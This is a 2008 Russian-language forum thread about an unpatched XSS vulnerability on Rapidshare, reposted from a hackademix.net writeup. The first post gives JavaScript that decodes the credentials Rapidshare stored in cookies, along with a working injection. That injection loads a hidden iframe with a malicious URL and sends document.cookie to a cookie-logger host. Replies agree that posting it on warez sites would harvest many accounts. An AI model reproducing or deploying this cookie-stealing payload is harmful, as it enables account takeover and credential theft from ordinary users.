PDA

Просмотр полной версии : [XSS] Rapidshare


Wh(te
15.07.2008, 18:08
Nktpro любезно сообщил о последней XSS уязвимости на Rapidshare которая до сих пор не закрыта, несмотря на то , что о ней была оповещена администрация файлообменника еще месяц назад пользователями сайта.
Но на что Вы можете расчитывать от людей, которые хранят логин и пароль в cookie?
Да , убедитесь сами: Rapidshare cookie имеют вид: user=12345-%36%37%38%39%30.
В Javascript,
cookie = "username=" + login + "-" + pwd.replace(/./g, function(s) "%" + (s.charCodeAt(0).toString(16)))
Поэтому этих cookie достаточно для получения доступа
var [login, pwd] = cookie.replace(/.*=/,'').split("-"), pwd = unescape(pwd);

Это значит следующее , если включить этот код в сообщение в блоге который посещается множеством пользователей rapidshare , можно получить огромное колличество аккаунтов.


var injection = "<script>(" + (function() {

new Image().src = "http://evil.hackademix.net/cookielogger/rapidshare/?c=" +

escape(document.cookie);

}) + ")()</scr" + "ipt>"

var iframe = document.body.appendChild(document.createElement("iframe"));

iframe.style.visibility = "hidden";

iframe.src = "http://rapidshare.com/cgi-bin/wiretransfer.cgi?extendaccount=12345%22" +

encodeURIComponent(injection);




15\07\2008 ©http://hackademix.net/

!JaX!
15.07.2008, 18:15
Т.е если отписать этот код на варез сайте то мона получить ДоХуЙа акков?

_kREveDKo_
15.07.2008, 18:35
Угу, можно =)

.Sylar
15.07.2008, 19:04
Оригинал:
But what can you expect by people who stores both your username and password inside your cookie?

Неправильный вариант перевода:
Но на что могли расчитывать люди , которые хранят логин и пароль в cookie?

Правильный вариант перевода:
Но на что Вы можете расчитывать от людей, которые хранят логин и пароль в cookie?